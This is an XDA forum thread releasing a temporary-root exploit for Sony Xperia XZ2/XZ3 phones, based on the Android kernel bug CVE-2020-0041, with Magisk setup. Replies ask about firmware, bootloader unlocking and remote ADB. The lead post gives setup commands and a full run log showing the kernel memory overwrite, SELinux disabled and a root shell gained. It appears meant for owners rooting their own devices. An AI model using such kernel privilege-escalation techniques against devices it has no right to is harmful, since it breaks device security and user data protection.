• Introducing XDA Computing: Discussion zones for Hardware, Software, and more!    Check it out!

[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread


Jul 23, 2009
some links for xz3 japan versions




Jan 7, 2019
Sony Xperia XZ2 Premium
Idk, just try it then you will know. When you have a root shell try doing the command
setprop service.adb.tcp.port 5555
stop adbd
start adbd
If that works without problem you can connect it via termux or any other adb shell, on termux like "adb connect localhost" then you can wake up magisk from there I guess
Yes, thank you very much, this seems to work remotely from adb pc to cellphone, btw my friend also succeeded by using another device that has been rooted and used as adb to temproot this is useful for people who don't have a pc, and my curiosity has not answered i am very new to this , can you tell me why when mount -t tmpfs mode=755 none /sbin it generates bad system call i try to enable -V there it says max 2 arguments
Please tell me why such an error? I'm dying of curiosity :(


Jan 7, 2019
Sony Xperia XZ2 Premium
I found this:
Port detected diag with qualcom qpst
The connection method is by ip address in the same network jaringan

Can it flash boot and unlock this sony xz2 bootloader? Here there is a flash menu with an .img extension too

I've already backed up qcn and it worked, it's also useful for buckup & restore qcn for locked imei devices from every country
Sorry it's too long, I hope someone can answer my curiosity, thank you
@j4nn and Team and friend in XDA


  • _20210727_204142.JPG
    52.4 KB · Views: 100


New member
Aug 20, 2021
[USER = 4418980] @ j4nn [/ USER] Tôi có một ý tưởng. Tôi hạ cấp xuống android 9 sau đó nâng cấp trở lại android 10 bằng xperia Companion, sau đó tôi lấy bộ nhớ cache của xperia Companion từ máy tính của mình và nhận được một tệp. khi tôi trích xuất nó, nó tạo ra một payload.bin, sau đó tôi đã tìm kiếm một số trình kết xuất và có một công cụ quản lý để giải nén nó. và nhận được tệp như trong ảnh. Nhưng tôi không biết làm thế nào để có được sự bù đắp🤔

Hey can you send me that payload.bin and thank you for that


New member
Jul 25, 2013
Palm Desert
Any chance someone has a copy of 52.1.A.0.532 firmware for H9493? I can't seem to locate an archive. Sony does make the .tar.bz2 dev source available, but I lack the tools/expertise for recompiling linux kernels.
I'm considering trying to flash the H9493 with one of the 52.1.A.0.618 version firmwares instead, any reason this might not work before I try it? This model does have 6GB RAM versus the 4GB of the other variants, but that's really the only hardware difference. 🤔


Sep 22, 2021
plzz hlp me i download it this rom 52.1.A.0.618 xz3 h8416 and is zip ext if i unziped get 3 zip how i can convert to ftf extention or haw i can install this rom zip file all this for root my device locked


Aug 7, 2013
Hi, right now I using Xperia XZ2 Premium AU unit with android 10 global rom. I want to enable VoLTE for Malaysia carrier. But I only found XZ2 Premium Dual have Malaysia Customization. How do I customize XZ2 Premium Dual ROM to XZ2 Premium Single rom, only for customization carrier
XZ2P Single IBE.png
XZ2P Dual Mal.png


Aug 3, 2021
Xperia XZ2
Its possible to unlock bootloader on xperia xz2 that running temproot? I have xperia xz2 but bootloader unlock allowed is no, another one lg v50 that running temproot can be unlock bootloader with xbl partition


Aug 3, 2021
Xperia XZ2
Can you make for H8216_52.1.A.3.49?
Firmware H8216_52.1.A.0.618 very buggy, battery drain too fast, auto restart power off and cannot using screen mirroring, its cant be using daily driver
  • Sad
Reactions: hibikase


Apr 13, 2016
I accidently deleted magisk manager random package name. So after i temproot again, my xz2 didnt detect rooted device. Because the random package apps is removed. How i can restore my hidden magisk manager so my device can detect root again sir ?

Thanks for advance
Dec 13, 2013
so, i do this temproot so i can increase the ram swap on xperia xz2,, the problem is some apps detect root and i cant use it, is it possible to disable temproot without reboot ?

Top Liked Posts

  • There are no posts matching your filters.
  • 31
    temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.

    This has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the tama-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      cd /data/local/tmp
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                            
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                    
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                    
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                    
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                      
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                              

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
    There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
    For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

    Exploit sources for all releases are available at my github here.

    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    implemented magisk setup from temproot

    finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
    • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
    As it seems .618 fw versions get missing from xperifirm, please let me know if you need some - I still have following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload it on request.
    So you did it again! You are insane mate!!